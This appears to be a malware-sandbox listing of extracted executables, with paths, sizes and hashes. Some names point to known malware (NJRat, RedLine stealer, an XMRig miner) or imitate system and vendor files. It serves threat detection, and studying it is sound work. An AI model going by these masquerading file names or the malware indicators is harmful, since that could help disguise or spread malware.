404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0

SHA256
3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6

SHA512
536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

Download Submit
C:\Users\Admin\Desktop\Files\Files\AsyncClient.exe

Filesize
61KB

MD5
a4314ad7e9a2945cf99dd03e9e46f7c1

SHA1
326c096e183a17cbc41034c6b6a6917de5347a86

SHA256
22639054481629b24309f3ab18f016231ed4f3de6fa6b852598848c1dbe7cf1f

SHA512
5787f414ebf281f581e26d21541915897e741995528bb7cc20e5d7c02d8a35e05047cd47e231d3ea389986323ee58039844c075134869a3e63d004c11f08a8c8

Download Submit
C:\Users\Admin\Desktop\Files\Files\CE5M.exe

Filesize
14.1MB

MD5
f33eeceda472b6cc6b7880dbba4f4d1f

SHA1
f7aadb89b32d89f593b4c1064d29209496468460

SHA256
beeebb1db3f480c09137138d9d8e1cc9b114a927deb4b917d7c46e4e387f4a2a

SHA512
d552017090cf1b77d8ad4f9fe91cc8ad8a7ca915d2ae446c31102990119b4923df0b666e7e39df8f55152c8308f926e8eb6dd4289e870f927e4076ec1bd46387

Download Submit
C:\Users\Admin\Desktop\Files\Files\ChromeSetup.exe

Filesize
1.3MB

MD5
bdb4ee3cf82788678666604f0941d1c3

SHA1
62f1dd4c66015ffa1bf91f278713ed9ee3cf5d2e

SHA256
88a94358abb1292e3f9abc1b39cd93a5509e173de3cd727dd68867bce608c144

SHA512
442008188f7852568681b1655590e9dfb76a54c49543ebf01dc8724fa20ab8019050ef1284d645270abaa2ed1f30786dfdd41a889828209a94562ed892fac626

Download Submit
C:\Users\Admin\Desktop\Files\Files\Client.exe

Filesize
3.1MB

MD5
aad11067aa90b9d96958aae378c45747

SHA1
13dc757a06a092ab0ef34482c307604a67fd74b9

SHA256
2787d416bf228915debc5d9c9e058cc246f8da7217c706d8a1fe0cb788a9155b

SHA512
8a2fc9cfc72b7f9fb0ff54292022d738013813f222ebe3d7e54f1d916a6307d7652a5f4276d38550e6c515e637358b039a3f784e70a187e2d754b60eaff26813

Download Submit
C:\Users\Admin\Desktop\Files\Files\DK.exe

Filesize
423KB

MD5
14988e9d35a0c92435297f7b2821dc60

SHA1
8c00da2ab4cf6da0c179f283eac0053231859f8c

SHA256
677b8ff45ebb9486a99aecf8dd2b4b362010573ecc4d0d082eda6a36a7cab671

SHA512
808401d94154a10a5e531b51af6f0a4876b9bbc0c288c33eb964101b30780766a4d7539cb146285d0bceddca4fbc77e072aab91224ab66c29c3feb04a13c2221

Download Submit
C:\Users\Admin\Desktop\Files\Files\Extension2.exe

Filesize
72KB

MD5
d1ba5271cc1825702119cfd7e0232f81

SHA1
89515a56e8963338673fc076f0143ddd005910fe

SHA256
9b4013e7e8decdbe58db125765084aaaff774701c363ffbbd4f8dd24eda4fc3c

SHA512
88ef050d054f7c7bf847c762c34a4797e171534c769265b615cdb75246b6535c5b97e135f94431debd2cea2cd8b7fd905f08c601d3032545e7842fd04e8c0728

Download Submit
C:\Users\Admin\Desktop\Files\Files\IATInfect2008_64.exe

Filesize
128KB

MD5
9d0543fe47a390f1e4c7c81bb3326637

SHA1
197c81881acd0ffc7d9219e4a9df1688714ea70e

SHA256
58be2f77908a38e2ab7120837ba4985d3ba6b3dbe43e872ae039c69cdbc947dd

SHA512
e92518aed9f662f3786e091a611ca13ab837b5eb14bada98910328b0d1b9de163f53c1afa7e57a7e9f9b3e44af46e8afaa1f4e804b20f37e6329d329c521570b

Download Submit
C:\Users\Admin\Desktop\Files\Files\Microsoft_Hardware_Launch.exe

Filesize
93KB

MD5
7e9aea4310d362cc62c7eef48b9bea7d

SHA1
0d0f4ba4460f30731da5f5b7a2df5538fc39509c

SHA256
7ebeecbc8be6ef0639cdfc58a6e7adb22786de3268efbc71a84e2407abf30c0e

SHA512
7e4a2f2076adebf213e2d86f5e8924924db0f609cabd4e55a4707a293410cad83dd93c3c82a4e93fa9d580454e9e20549c621dbc3b7733081874b99ff747b415

Download Submit
C:\Users\Admin\Desktop\Files\Files\SGVP%20Client%20System.exe

Filesize
3.1MB

MD5
f611f4dd12e51ca7a946f308ebd5e04c

SHA1
2f7d049ec2b3ae6a8113b499d92ebc117eed890c

SHA256
d0ff0914a4014573716701a665b7950e49594452a6a7418a049553f8c7c1be73

SHA512
7057884406612bff108f1e315efacf83a99f1ec725b4496e737a57938b67edf5f23476b8f99395ec9f8ba355a68779fd5a2668b9caf0ca32b8862529eb413b83

Download Submit
C:\Users\Admin\Desktop\Files\Files\SharpHound.exe

Filesize
1022KB

MD5
aaf1146ec9c633c4c3fbe8091f1596d8

SHA1
a5059f5a353d7fa5014c0584c7ec18b808c2a02c

SHA256
cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272

SHA512
164261748e32598a387da62b5966e9fa4463e8e6073226e0d57dd9026501cd821e62649062253d8d29e4b9195c495ecaeab4b9f88bd3f34d3c79ed9623658b7c

Download Submit
C:\Users\Admin\Desktop\Files\Files\Uploader.exe

Filesize
72KB

MD5
d8e3b8e49c46b0fced9d4c6a2a553654

SHA1
731dd7fa150f651d6f598b32e7897e16f47d5b25

SHA256
652dca0e1df976da497b4bd7fbb40f28d0756b78b349766505748bdfe77c4963

SHA512
9db2c490bdb95f5f204b2c88189999b49b682b7694f442fa67d8348c5bbe7de75c40bfcd6eea5e0de6213556722b7c3960e1dd79e7213d994ab4b41cc24e0a92

Download Submit
C:\Users\Admin\Desktop\Files\Files\XClient.exe

Filesize
69KB

MD5
d7e7388184d510f7fd4acc4cae6dc66e

SHA1
b6e6818288c1147aa34fed53cc0f4252c0d5d8b4

SHA256
f265d5394e8484ac12325631b752721a140091546c0aead0d6139e8ca4376cf3

SHA512
cf6e7f7b707bec6e951cdfef846b66a56579f4610a2889746fe6ba8b4166055f202f5d4eeaa56fa8a3e5e5c86f9996b25292d22feebc24584f0ba405e24d4990

Download Submit
C:\Users\Admin\Desktop\Files\Files\XClient.exe

Filesize
1.8MB

MD5
f4f891e67d6e6f0d3fe5e78115730a7d

SHA1
dfe9b1f2098b8d146787eb2368e7161bdb4ac81d

SHA256
c73619c529306eb78f56d3f18bd9ef3f48d4c0a7896d8b874acb1673ab96a046

SHA512
0836f2d09f52d48b9cf30bb644f78d2b8b24153eb4bdb45a4e8732b14b1690d074139db0359d899fa7ccc29c763c0c3aaba33f2eb859375831a4393c1b7fe9a3

Download Submit
C:\Users\Admin\Desktop\Files\Files\agent.exe

Filesize
72KB

MD5
aff07019035bbfe5bac96d943fadb530

SHA1
8a9b99cbd0d9ab725c5cace0ef9a73658a1c96bc

SHA256
c2e367c6f38b6276680526550403573a74e4db2f2469c7936afc2b935781feb6

SHA512
99832091629c45f785f842ad69f46054c6cda5ed957fbc26a6b4b7d2ae73f62871a51270c8f5d2749ee7803944d0f282cfcfb9b2168476a8814b063fc0d292df

Download Submit
C:\Users\Admin\Desktop\Files\Files\artifact.exe

Filesize
17KB

MD5
ede69af9ae89011d6118e2f3e1f30219

SHA1
5e9284c463542ccef1e2083973bfaa7fa207acda

SHA256
5d85b017444b2fab71ad0caeba8e6ab7f30a94f79a85ed256450e026a02e9132

SHA512
298e124dff6c3cac2532f35ba14995c40c44eba17ea145a724490a77945bbc797a3dd8c369a728a5594c9fd605421bab48dae712d9a5151194e82526044b6cfb

Download Submit
C:\Users\Admin\Desktop\Files\Files\c3.exe

Filesize
547KB

MD5
7380f81020583fbd19f1ee58a68cbb80

SHA1
3ab2027003eab9e9cd87b773ca2bc3636dac1cd8

SHA256
6090b7a906bf8c39d5b0fac9c383305388d478615585d5fd03e9c709834706ea

SHA512
10fd84783c323790555f7c1c8b737ea8cd9bb54aaaf9231cd3c6651fec740a455b75e1af2f68e4f316844a8f644e7340cbbf8def65c7710e1538f3188c115356

Download Submit
C:\Users\Admin\Desktop\Files\Files\cdb.exe

Filesize
485KB

MD5
3fd5aae11b1b05480a5d76119dc6ab2b

SHA1
465f35c8a865b5904474bef9be163e680549f360

SHA256
cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9

SHA512
39fe1c8ca47aaff80a6fd87128cd64e930fcee6c345298e66446a5402b9bf3bfb28a5aa49486d89ec1ae23003111a16a34149f66bcaccd3b508b95db4f909322

Download Submit
C:\Users\Admin\Desktop\Files\Files\dayum.exe

Filesize
23KB

MD5
aa6a3fbb8d78e21710da58d6e7b87f86

SHA1
09c8e4815c16a732d9842ef97fda4e347ad0ee27

SHA256
9af4cf4b24bdb010ba408a9c9b3f26e0c52dd6d6dd3c0a9bd12180dd9028210a

SHA512
724a7d8799acf7680ce0ea65e3902a0650aa9f2c635013d1e86a0dbd2ccba6ece5ab7981c8c71b4510d0cfa5a2e3160a722c2aa584f488e181f5f5cbd9479bb6

Download Submit
C:\Users\Admin\Desktop\Files\Files\defender64.exe

Filesize
3.1MB

MD5
a3ffca2a5a9a4917a64bcabccb4f9fad

SHA1
9cfc0318809849ab6f2edfc18f6975da812a9f51

SHA256
21a6c7941638ef73d9b41185eea6f284f2df63d818a0aed86c391aa1d5aa26fb

SHA512
d491dcf7bf4d7d20632b31e82eee824ffb1eedca18f0f25b46aae1750f40240589e4600566e327bd866374ec36321db2d79f05fe6fc49ed3d30901e31bfc384e

Download Submit
C:\Users\Admin\Desktop\Files\Files\dxwebsetup.exe

Filesize
288KB

MD5
2cbd6ad183914a0c554f0739069e77d7

SHA1
7bf35f2afca666078db35ca95130beb2e3782212

SHA256
2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f

SHA512
ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10

Download Submit
C:\Users\Admin\Desktop\Files\Files\gdwadtyjuesfshas.exe

Filesize
135KB

MD5
bc48cb98d8f2dacca97a2eb72f4275cb

SHA1
cd3dd263fc37c8c7beb1393a654b400f2f531f1c

SHA256
c18fb46afa17ad8578d1edd4aa6a89b42f381ca7998a4e5a096643e0f2721c49

SHA512
7db6992278ca008e7aafa07eb198b046a125d23ca524f15d5302b137385dd4e40a4a54ce4dabb28710b71fbcfdd2d3315fb36e591edc2b3e1737b11b9ee45a5c

Download Submit
C:\Users\Admin\Desktop\Files\Files\injector.exe

Filesize
3.1MB

MD5
7d13d756b342ff87ce8db9749afac263

SHA1
97ca7f6dfbda61b1f81eedd15ac782caedd74db5

SHA256
debb1fc4bbe5a6ee929d11766367ccc6f641610469fbd8e704895683db6f7360

SHA512
4683fffbde6993ed877f73b87b39ee40e712d822f18341bd20787183771af73cd07f9757a08a334b58be6ef61186db5f7285402ea5e90886654ecfa3085b8438

Download Submit
C:\Users\Admin\Desktop\Files\Files\injectorOld.exe

Filesize
2.1MB

MD5
bca6232c1c3676cd80a1b048b3b2da42

SHA1
5d3088d22a5ed796b5a4dfb41d6f2503bf747f03

SHA256
c101b4b11829414431c1f6c108806c0a8fd99f07bd9960b9600afbef12cf85e4

SHA512
6b779003cd4119cbca3078151cd7d41af42fa4f61b5e22bd374df614cde975d0bc6e256bac7431fd814e417af45bcc4371444f38eeaa1dc54de5913c9a3b0df0

Download Submit
C:\Users\Admin\Desktop\Files\Files\installer.exe

Filesize
3.1MB

MD5
dbde842faf140037f07cad5bd09771e9

SHA1
64dbcaf7d1e664556b5fd82e0e8b8efeae38dea0

SHA256
9b4a5a44a932c5c42086a5989f87a5261ab8e6e96bc8ea2c0cf7ca6de68bc7ad

SHA512
8a970a2ef3e0bcf378acce7a748289b8cdc68c5ff7b50d940dd4ce1f94c9790e9be6a440e1baf57e5fab8a6d767d4a1ddbe6b2244c23a95f91f553af32339885

Download Submit
C:\Users\Admin\Desktop\Files\Files\jgesfyhjsefa.exe

Filesize
288KB

MD5
26e2495c2fa61cf0dadf028726236ad4

SHA1
de0da2ea7ce65724faedd3f8239c8559000a293f

SHA256
b19963afaca6cfb8252041c70bdeda48b029ac9be3411a61342490c48a472583

SHA512
7e66a4eb948a0f4be858d694a62a215cfe2b3215d6506d816cb8e09895731dd3f80222e030922f73a48b4d86525a4d7b680d40c7023886af3940b9eec07aa0fa

Download Submit
C:\Users\Admin\Desktop\Files\Files\joiner.exe

Filesize
93KB

MD5
ceabf00e91c6d219345af40a28da43e8

SHA1
1203c6455e46b4a7007dea71f81849d50e3e48c1

SHA256
a4d2060b27fbf0500f87ddf80278ebd9f7c0861d487250b0048a4fd87fa79b8f

SHA512
6098e888ebde819d137d9132d7f27dee52c9214c64f76aad6ddac713426ad62a10cf37c36d9bcd568156b5c83f43cad80cb4608705e1eea7cd220a00ca04707f

Download Submit
C:\Users\Admin\Desktop\Files\Files\kfhtksfesek.exe

Filesize
1.2MB

MD5
690dbcea5902a1613cee46995be65909

SHA1
deda345046ddfc3d93cc15582e509ebb98bc7206

SHA256
7adb9bc755c82a599359ba8c3a61f1dd99d80ae2501b2bc63cbb6f8580cbee11

SHA512
1b9745341570d1fb8d304b5b69f63119c6c6149a06aa30caad4d61b66102ebfc37824c24b7aa0ff057a1c0d725651459fc3487691c46646c555d317a3229057f

Download Submit
C:\Users\Admin\Desktop\Files\Files\lastest.exe

Filesize
37KB

MD5
d51ff4ddc2f854ca93e0f1d04b73f29e

SHA1
48c15d887fdb2b303def489c857db926cc4453ee

SHA256
b4805d9fa4ac2354f8819c739ddf7095c397e916b29468f065c0907394909fe5

SHA512
5103202e3357da07625653c74957b85949467a7b26506148981e3469ac0df6003e1823f7d66880da31bbc7edfb0e4d93aade6c9c989fb71fcfcac12e434562d4

Download Submit
C:\Users\Admin\Desktop\Files\Files\lkyhjksefa.exe

Filesize
1.2MB

MD5
0844b5ba505c4c86733c017eb2014648

SHA1
1eaa9c33ee8bc1e541a0a2566d6bc990bfbde825

SHA256
c5bba04cd1c49270dff46e068c8cf64e1c87927d3bdb0e40a219d3be28f7538c

SHA512
967dcf26e8a4a8dd20fc33ed4c051a6c514fbbe03c4efd30a381985a1f074b0b71bc8f95bc1f10fa75f46bced9a84ccf40a2b524f91e3a44b84a531be5d475d4

Download Submit
C:\Users\Admin\Desktop\Files\Files\pyjnkasedf.exe

Filesize
409KB

MD5
3a94ac80a1bbe958b6544874f311be69

SHA1
bc6352ee84bed107a4b30b545934698c4e664baf

SHA256
1839ee5c3534ad1a6929c9de33bce63cf6f96cce1ae3dc8240f4cf352250db0f

SHA512
f31d93889251ec2c6581107a7a0122be63d5f7b8253403736d38f1d2ffa2cb693e30a205ceb36b823265fd58bb2854cc44064988110daf3fe1c8ea02e7d2227c

Download Submit
C:\Users\Admin\Desktop\Files\Files\rat.exe

Filesize
13.8MB

MD5
c760bbc8f0332474164dfa8d539f8d89

SHA1
166f71a877d94ce1b16800b5a97cc308fc5b3018

SHA256
da191732a3ffc7b062382d0c125af7e7a1d0f019acf89bc8e22a6d57ae8f498b

SHA512
be85e77b3cb752b90e069753ed5530190f7c6aeb0279242e3314f43a5fca0e7a1b360a2aeab75f3d4b0c7ea925054eccabe32b9555dd410cc781e25ebfb66093

Download Submit
C:\Users\Admin\Desktop\Files\Files\start.exe

Filesize
45KB

MD5
b733e729705bf66c1e5c66d97e247701

SHA1
25eec814abdf1fc6afe621e16aa89c4eb42616b9

SHA256
9081f9cf986ed111d976a07ee26fc2b1b9992301344197d6d3f83fe0d2616023

SHA512
09b59b8942c1409a03ca4e7f77c6007160af4d557386b766516dba392750869c017d0fd5d6fbbfcbb3e559a70ad42adcb498595df186be180cfc04e921d74320

Download Submit
C:\Users\Admin\Desktop\Files\Files\svchost.exe

Filesize
1.1MB

MD5
04e852bc54ac36d41f49c87c6c54bb6e

SHA1
ac927e038c9431f0517bac4ab4c7b4745220247e

SHA256
b09cfb05b8e8f9e6e56816595aa309388795fd3b70eb6e7549c125b0e34b120a

SHA512
8182faaa2d2f7731938431f051087050c805fdf616d0ba14659cb5593979fbf81e4e4239844a7fc9206767b7470f45d281564f129641eeaca12957dafee6fa77

Download Submit
C:\Users\Admin\Desktop\Files\Files\upm2008.exe

Filesize
142KB

MD5
6df053d45e14a6c0b083907cb88b2653

SHA1
68c8e5fbd6c6592cae19e666e63eb8185256a1f7

SHA256
5df5683c1d9972b31e8bbe48e48690a76d81817941b85883e9e79423fe65db21

SHA512
e3dadaa84537a6f0edd926a580b481d973ad37d79877d32eb824e7b0f04e5318ff9fc0f2c79af5bb09226a9128dec1d92300951c39ce33b349e4f2e2ff2bf810

Download Submit
C:\Users\Admin\Desktop\Files\Files\uu.exe

Filesize
348KB

MD5
d92b40747b5d7d55af91583f44f23fd9

SHA1
2e8ff2af588150d868d3c9bd735a5f1d4b966e27

SHA256
1e68461dbed6cc77c53808defed0071b243a9fbae1bf36576a124d843ebfe0eb

SHA512
c357f9ad39f71d68a37edc346cfdb7f957bd65e2b53bc31e2cae1cc12e0ad9ad245ca4d959bd4b2a9be4d8a7df019de6d4332f88d60552692811c4cf8fc2a9d0

Download Submit
C:\Users\Admin\Desktop\Files\Files\win.exe

Filesize
5.1MB

MD5
73e0321f95791e8e56b6ae34dd83a198

SHA1
b1e794bb80680aa020f9d4769962c7b6b18cf22b

SHA256
cae686852a33b1f53cdb4a8e69323a1da42b5b8ac3dd119780959a981305466b

SHA512
cc7b0ddf8fdb779c64b4f9f8886be203efb639c5cad12e66434e98f7f8ac675aee1c893014d8c2a36761504b8b20b038a71413934b8bc8229fdde4f13c8d47bc

Download Submit
C:\Users\Admin\Desktop\Files\Files\xmrig.exe

Filesize
5.3MB

MD5
93655baf77e96e0a513285a426ba608f

SHA1
4eba35b80dba05974b460ff3bff13478cc8a382b

SHA256
228328ca683a5eda547a57d37c5ef76bb3ae6f9530346b6280e5236bc1d05ed7

SHA512
bc531a825ae62e0f0c22af5d149d5195bf091319feb4e4409d20efb9d6abf1fe7b600100f4cf0acfe5b3709bffc92cf439a167b4514542413ad251852abfc91c

Download Submit
C:\Users\Admin\Desktop\Files\Fixer.exe

Filesize
300KB

MD5
d128291a5d60b17b22dccbedd7b711fd

SHA1
7ee96b938de052f70026664b8a4f3be6a80a6596

SHA256
9ff724fb4c48b8da74c98b621cddff271942047617f04443ba3b1ed0b8f70d4d

SHA512
9c95023be796fbd58a5fee7a02161be17612b008609531043bfe44d25c7aca7c2c62e2d0f64d6cb1c5efda6089c826618d5aa48cbe171a0025e6356d66a25a5c

Download Submit
C:\Users\Admin\Desktop\Files\GOLD.exe

Filesize
290KB

MD5
00a1a14bb48da6fb3d6e5b46349f1f09

SHA1
ebc052aa404ef9cfe767b98445e5b3207425afaa

SHA256
e3fdbb915d6a6737a13da5504ace5a279796247e3b24b3b049ee58013687fe35

SHA512
643f42aefd628143ec596c7ff4c6847b24a297e6996bf840d6de3f0364fca61bdb5ce322b709b2df748d189d233973a301d371d37f4e8291be8938205c49963b

Download Submit
C:\Users\Admin\Desktop\Files\GREENpackage.exe

Filesize
7.2MB

MD5
d165b333fe9244a43967bc69c0b686cc

SHA1
58fbba484bdeeb020cc69a78218c897d28f7e2f2

SHA256
01a2bb9f7591986b6eb3388699e7ce4a52b2686295b48dae0ec001639ba9f9b4

SHA512
616556797aaad5deb2d5e8e8a70427d4e0b9ca4f64dd5976cdeaa3c6d8a37a612011e89b120a6ef2e1ef8a50d70483a71d8289a09952f612a9023d5f2922b580

Download Submit
C:\Users\Admin\Desktop\Files\GoodFrag.exe

Filesize
31KB

MD5
14caad7ca134fecc2f7a410c00d04bab

SHA1
c9561c1ce6d69d66c211e74de945bee7e72b2fd7

SHA256
6dd71673be0e890114a8c455c51976f8b67fcf2991b3207bb88bb317abba43e9

SHA512
2f08c1d119cc955e282525311bc7125429be0c27ea799d44acadb3f31cb238012e2930826b6ec5805d365c965032839f87419038d98ad58517d53189317dfa92

Download Submit
C:\Users\Admin\Desktop\Files\Gorebox%20ModMenu%201.2.0.exe

Filesize
3.1MB

MD5
1c1a86dad78326429577ab0b7b7b5858

SHA1
cf9aeb9a02d368918d89fc69d55b38829ab83039

SHA256
5df3470db00597e3da516459648dfa6a2c1564a57c1d51817d952beeeb860a2c

SHA512
db9658604a62090fd69cbb7504bf320c947473dfdb10be9e7e866af0a47db228755c1ff8e740eacbe20481df71bc5527347c4185e831515b30ab91b07e46b204

Download Submit
C:\Users\Admin\Desktop\Files\IMG001.exe

Filesize
3.4MB

MD5
d59e32eefe00e9bf9e0f5dafe68903fb

SHA1
99dc19e93978f7f2838c26f01bdb63ed2f16862b

SHA256
e06aa8ce984b22dd80a60c1f818b781b05d1c07facc91fec8637b312a728c145

SHA512
56a3790205885d12252109fdf040e5527fad8a11811e7471e7d406781c9bb4e3514b074daf933a3865de03f99cd13d93203d5478a69e87692cdd016741b73587

Download Submit
C:\Users\Admin\Desktop\Files\Java.exe

Filesize
3.3MB

MD5
f29f701e76e3a435acdd474a41fa60ba

SHA1
10f06b6fc259131d8b6a5423972a1e55b62ce478

SHA256
9cd175451c10b5f9e2dc3987f986b33a0a35294d47826dfde104171e65b84fba

SHA512
0d5088f4f685b6d29edec7cc7e8bfe7c594fa6b3fde2a6b11ee977455d6fe088e04e899203171ff519cf9d2b5a78231f3650774cc17824219f43f947d13a86e9

Download Submit
C:\Users\Admin\Desktop\Files\Java32.exe

Filesize
3.3MB

MD5
bc884c0edbc8df559985b42fdd2fc985

SHA1
9611a03c424e0285ab1a8ea9683918ce7b5909ab

SHA256
e848b330ee5a8bd5ae1f6b991551e30a4a5b2e5deeb4718a15b2122101f2c270

SHA512
1b8c97d500de45fbf994dcd9bf65cc78106a62ff0770a362add18866cceebbe9f5e157a77d26cb0d0d8de89abe3d446bc911f33e7027fa8f8809d2720b0cedcc

Download Submit
C:\Users\Admin\Desktop\Files\Macro2.exe

Filesize
72KB

MD5
e0dbf63fbaba9fd87d48a9a0f1147c18

SHA1
28fc4efb669a4198234b55e0cfb6bdd39b500692

SHA256
7f03382b370fbe1864dd6a4e488c0c35366aa83542916cce18fa7785b454025c

SHA512
3a4f86ac97c06b0bc420552f42537c6451fbb4137c3e6cb2589551d72733b2021ee491a041ed77c01e2dcc95ec70090732fcea6b952f26323cef85d9d157300e

Download Submit
C:\Users\Admin\Desktop\Files\MajesticExec.exe

Filesize
12.0MB

MD5
1963ce8f3f680d344d195bc27449b9a7

SHA1
2e6003b291dd2ffde77487be166536f63c66c672

SHA256
46d936bdc8ae3c40d119eec506b3a8aef4f6b97d10207fe4768692c3e887d082

SHA512
fb628ec38dc1e477fd90059b7a5901b0a76b43cb3bdebab38f50d85657385668323a97206769ca73028c94b9ee053a483828ce0a56a032bed2c3f5848b7025a0

Download Submit
C:\Users\Admin\Desktop\Files\Meredrop.exe

Filesize
32KB

MD5
7867de13bf22a7f3e3559044053e33e7

SHA1
42e56d72982ac04edba2ce7fb9f4e5048766aa94

SHA256
a29d02251f54567edb1d32f7c17ce4c04d5c54e317eb3b2bea2a068da728e59a

SHA512
f2b15fc7a6a255aeb1f66a66069482a0a882a43e00d4dcbeb41544ecd86089cd5bf614a8d9949792b6eff8248e9f213a2ebb4ca16597bc5b9b85dcf7be342ae8

Download Submit
C:\Users\Admin\Desktop\Files\NJRat.exe

Filesize
31KB

MD5
29a37b6532a7acefa7580b826f23f6dd

SHA1
a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f

SHA256
7a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69

SHA512
a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818

Download Submit
C:\Users\Admin\Desktop\Files\NVIDIA.exe

Filesize
10KB

MD5
3da09b942edac59bc7a540bc822e3442

SHA1
1dae7e12435d70649f4fbf949426f8c98bdbeae8

SHA256
aa6f15888d7e42537c6c02ebc6d27f4e8d295f853d6dde864cac30b30852df65

SHA512
e0480de61d73c1edd7e3e6fa88c625cec673726c8da27760dac18c097beb7c61c11063d7487ed187ba5d6050491257a99769895d53c4362bd1f242438653113b

Download Submit
C:\Users\Admin\Desktop\Files\NdisInstaller3.2.32.1.exe

Filesize
720KB

MD5
856b304059bba7cd73f05328e48daff8

SHA1
e9e52af6dd4715ece91d253bda4acba43abcf277

SHA256
f6ce81e27f70f5563c0e69a0d8e027deb28e96d3bef447d8cdd687ce3b8a3919

SHA512
fbf4373b94199b06a19e751f9cdcad6c05ecaed496f8d5d352f05bc5d6e53dfeac18ae3b5896f1da816c68da1c6254a7ea3335872aa8f296262662a67433606d

Download Submit
C:\Users\Admin\Desktop\Files\NoEscape.exe

Filesize
666KB

MD5
989ae3d195203b323aa2b3adf04e9833

SHA1
31a45521bc672abcf64e50284ca5d4e6b3687dc8

SHA256
d30d7676a3b4c91b77d403f81748ebf6b8824749db5f860e114a8a204bca5b8f

SHA512
e9d4e6295869f3a456c7ea2850c246d0c22afa65c2dd5161744ee5b3e29e44d9a2d758335f98001cdb348eaa51a71cd441b4ddc12c8d72509388657126e69305

Download Submit
C:\Users\Admin\Desktop\Files\NoMoreRansom.exe

Filesize
1.4MB

MD5
63210f8f1dde6c40a7f3643ccf0ff313

SHA1
57edd72391d710d71bead504d44389d0462ccec9

SHA256
2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f

SHA512
87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

Download Submit
C:\Users\Admin\Desktop\Files\OfferedBuilt.exe

Filesize
2.3MB

MD5
00614852dbe5c98d84c4501702d04e93

SHA1
9d241403a7f438b9d14be0da70dc0089791f0971

SHA256
fca76f40550256c7a1cdbb342fcd5e15b05a56ae214ea80cc2288f12e4257418

SHA512
01403d2624044a646bbea613f93771aceb1b0466f13643b33ffc40c7d8add6744cb1401b26c921a3c0208050d6b3a6d57c22890472835a7a3875dae50c18b911

Download Submit
C:\Users\Admin\Desktop\Files\PCclear_Eng_mini.exe

Filesize
32KB

MD5
b41541e6a56a4b091855938cefc8b0f0

SHA1
8006b2728d05eab4c5d6dc0bb3b115ddc1e2eaa7

SHA256
d4c48762f128436fed18b9c714e55bf7360802127efb233ad31ec4b0f7f649b1

SHA512
a3c2b5dddbb5b8ded63e04672610287458b4bed6ea054e45804e612a2896d92412ef632c621a49b445412d8998a5edc914b055502e22fcfe0e178e5098b64828

Download Submit
C:\Users\Admin\Desktop\Files\Prototype-https.exe

Filesize
72KB

MD5
8e61b354360213d054bd848b3ad1fbf3

SHA1
f11a52494bebf33216e70fd5eeccde73c436d6a4

SHA256
a9c8c8c242be86a089d08aa19e5ec4557de0f4fd141dc421002352b06cea5f90

SHA512
ed937bfe8f385d9650d76688d1610c10facf79c6f222c0081a03c7e8aefc52e302501e706eebe77caa7dcc2855b64b770523e31709dd1bd56bf5b225cc169113

Download Submit
C:\Users\Admin\Desktop\Files\QGFQTHIU.exe

Filesize
5.4MB

MD5
6e3dc1be717861da3cd7c57e8a1e3911

SHA1
767e39aa9f02592d4234f38a21ea9a0e5aa66c62

SHA256
d4a388cc151fa56379f9ac6ef8b7851b6750c2ecfc2c8f6904ac6002865c4f30

SHA512
da91742e1494c027616e114e42d3333d61eda91379f6ad2ba415dc39e0b5165a25498d60537b3cb12a49267c306dfbec87d3af528e27abc9946cd5fda6b129c1

Download Submit
C:\Users\Admin\Desktop\Files\RedLineStealer.exe

Filesize
512KB

MD5
a957dc16d684fbd7e12fc87e8ee12fea

SHA1
20c73ccfdba13fd9b79c9e02432be39e48e4b37d

SHA256
071b6c448d2546dea8caed872fca0d002f59a6b9849f0de2a565fc74b487fa37

SHA512
fd6982587fba779d6febb84dfa65ec3e048e17733c2f01b61996bedb170bb4bb1cbb822c0dd2cf44a7e601373abaf499885b13b7957dd2a307bbd8f2120e9b3b

Download Submit
C:\Users\Admin\Desktop\Files\RuntimeBroker.exe

Filesize
3.1MB

MD5
b77d847b1d41cde07f81168c7addbb10

SHA1
2d5c614efdef7ab59fa5fb665d6ed1a79502b97f

SHA256
492a651e5ae2020b3b7fd51861adf68402089d050e083c3a9ef1a9866256000c

SHA512
6fff7c253c543e370dcb459f0cc66003f57fbc35f40af5744deca97a2c593bf0881f96c845bbc15963e9eb81a652aec78a500ea41f2d1af5fbb5f0ec04c6c9f6

Download Submit
C:\Users\Admin\Desktop\Files\SGVP%20Client%20program.exe

Filesize
3.1MB

MD5
1ece671b499dd687e3154240e73ff8a0

SHA1
f66daf528e91d1d0050f93ad300447142d8d48bc

SHA256
c72756ca6344b675d8951b16ff305d1f8e145bddac1dcac101bfdb79939831a1

SHA512
0cb5d1084e5e8ec0c30e6d5c559f5a0fd509f96bd5cec7b311d72b8d279e2ffcd9ffbbacb5b428d5ee84aa339743535db0d70afaa3008c6d46508ccaae37adcc

Download Submit
C:\Users\Admin\Desktop\Files\SearchUII.exe

Filesize
27KB

MD5
24453759fc86d34383bd0ffc722bbfb5

SHA1
495fa07508f0e79d9ce26f9179285d41303ce402

SHA256
ff4bc7221036ee331d8b913f12aec34493c11b6c2655dc15cf4281a6306126ab

SHA512
aad86f8232a676e1705319f0da2c45a89b533ecf5e8bcbc95d610683247f028b57ae7bf8b791468f6ce9b34962778cec205b48c4612c95c82967bb223ad30db9

Download Submit
C:\Users\Admin\Desktop\Files\Servers.exe

Filesize
3.1MB

MD5
ff8c68c60f122eb7f8473106d4bcf26c

SHA1
0efa03e7412e7e15868c93604372d2b2e6b80662

SHA256
5ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642

SHA512
